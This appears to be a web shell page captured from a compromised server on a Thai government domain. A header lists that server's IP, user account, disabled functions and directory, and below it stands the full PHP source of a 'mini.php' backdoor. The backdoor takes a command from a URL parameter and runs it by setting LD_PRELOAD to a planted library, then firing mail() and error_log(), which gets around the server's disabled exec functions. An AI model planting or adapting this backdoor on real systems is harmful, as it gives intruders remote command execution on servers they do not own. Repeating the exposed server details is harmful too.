| Server IP : 27.254.152.13 / Your IP : 216.73.217.38 Web Server : Apache/2 System : Linux ns1-252017.dragonhispeed.com 5.2.0 #1 SMP Fri Mar 29 22:50:14 MSK 2024 x86_64 User : coloflew ( 1072) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/coloflew/domains/tessabalpatiu.go.th/private_html/assets/ |
Upload File : |
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
if (isset($_GET['c'])) {
$cmd = $_GET['c'];
$out_file = "/tmp/out.txt";
// 1. SETUP COMMAND
putenv("EVIL_CMDLINE=$cmd > $out_file 2>&1");
putenv("LD_PRELOAD=/tmp/s.so");
// 2. FIRE TRIGGERS (These will run the command)
@error_log("a", 1, "b@localhost");
@mail("a@b.com", "s", "m");
// 3. SHOW OUTPUT
echo "<h3>Command Output:</h3>";
echo "<pre>";
echo @file_get_contents($out_file);
echo "</pre>";
// Cleanup for next time
@unlink($out_file);
} else {
echo "<h2>Bypass Active!</h2>";
echo "Use: mini.php?c=id";
}
?>